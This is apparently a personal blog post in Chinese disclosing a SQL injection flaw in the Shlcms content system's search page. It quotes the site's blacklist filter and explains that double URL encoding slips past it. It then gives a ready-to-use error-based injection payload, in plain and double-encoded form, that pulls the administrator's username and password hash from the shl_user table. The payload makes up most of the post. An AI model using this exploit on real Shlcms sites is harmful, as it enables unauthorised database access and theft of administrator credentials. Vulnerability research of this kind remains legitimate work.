Shlcms 注入漏洞

Shlcms 注入漏洞

新的一年 也是自己的第16个生日,所以在今天写点自己挖的渣渣洞出来,祝自己生日快乐。
我不太会,所以只能挖这些渣渣咯 也祝90sec越来越好
也感谢大牛们对小菜的一直教导 @L.N. @laterain
___________________________________________________________________________

新版的Shlcms

shlcms\content\search\index.php对keyword做了过滤

clip_image002

function checkSqlStr($string)

{

$string = strtolower($string);

return preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|_user/i', $string);

}

但是因为会解码 所以直接无视过滤的函数 没过滤%就好 无视GPC

clip_image004

POST的EXP数据是二次url编码:

dba%' and(select 1 from(select count(*),concat(floor(rand(0)*2),0x3a,(select(select(SELECT concat(username,0x3a,pwd)FROM shl_user limit 0,1))from information_schema.tables limit 0,1))x from information_schema.tables group by x)a) and 1=1#

%25%36%34%25%36%32%25%36%31%25%32%35%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%30%25%36%36%25%37%32%25%36%66%25%36%64%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%36%33%25%36%66%25%37%35%25%36%65%25%37%34%25%32%38%25%32%61%25%32%39%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%36%36%25%36%63%25%36%66%25%36%66%25%37%32%25%32%38%25%37%32%25%36%31%25%36%65%25%36%34%25%32%38%25%33%30%25%32%39%25%32%61%25%33%32%25%32%39%25%32%63%25%33%30%25%37%38%25%33%33%25%36%31%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%38%25%35%33%25%34%35%25%34%63%25%34%35%25%34%33%25%35%34%25%32%30%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%37%35%25%37%33%25%36%35%25%37%32%25%36%65%25%36%31%25%36%64%25%36%35%25%32%63%25%33%30%25%37%38%25%33%33%25%36%31%25%32%63%25%37%30%25%37%37%25%36%34%25%32%39%25%34%36%25%35%32%25%34%66%25%34%64%25%32%30%25%37%33%25%36%38%25%36%63%25%35%66%25%37%35%25%37%33%25%36%35%25%37%32%25%32%30%25%36%63%25%36%39%25%36%64%25%36%39%25%37%34%25%32%30%25%33%30%25%32%63%25%33%31%25%32%39%25%32%39%25%36%36%25%37%32%25%36%66%25%36%64%25%32%30%25%36%39%25%36%65%25%36%36%25%36%66%25%37%32%25%36%64%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%35%66%25%37%33%25%36%33%25%36%38%25%36%35%25%36%64%25%36%31%25%32%65%25%37%34%25%36%31%25%36%32%25%36%63%25%36%35%25%37%33%25%32%30%25%36%63%25%36%39%25%36%64%25%36%39%25%37%34%25%32%30%25%33%30%25%32%63%25%33%31%25%32%39%25%32%39%25%37%38%25%32%30%25%36%36%25%37%32%25%36%66%25%36%64%25%32%30%25%36%39%25%36%65%25%36%36%25%36%66%25%37%32%25%36%64%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%35%66%25%37%33%25%36%33%25%36%38%25%36%35%25%36%64%25%36%31%25%32%65%25%37%34%25%36%31%25%36%32%25%36%63%25%36%35%25%37%33%25%32%30%25%36%37%25%37%32%25%36%66%25%37%35%25%37%30%25%32%30%25%36%32%25%37%39%25%32%30%25%37%38%25%32%39%25%36%31%25%32%39%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%33%31%25%33%64%25%33%31%25%32%33

clip_image002[4]

密码好像是sha1 +md5 加什么什么的 反正一般破不出来就对了。

tag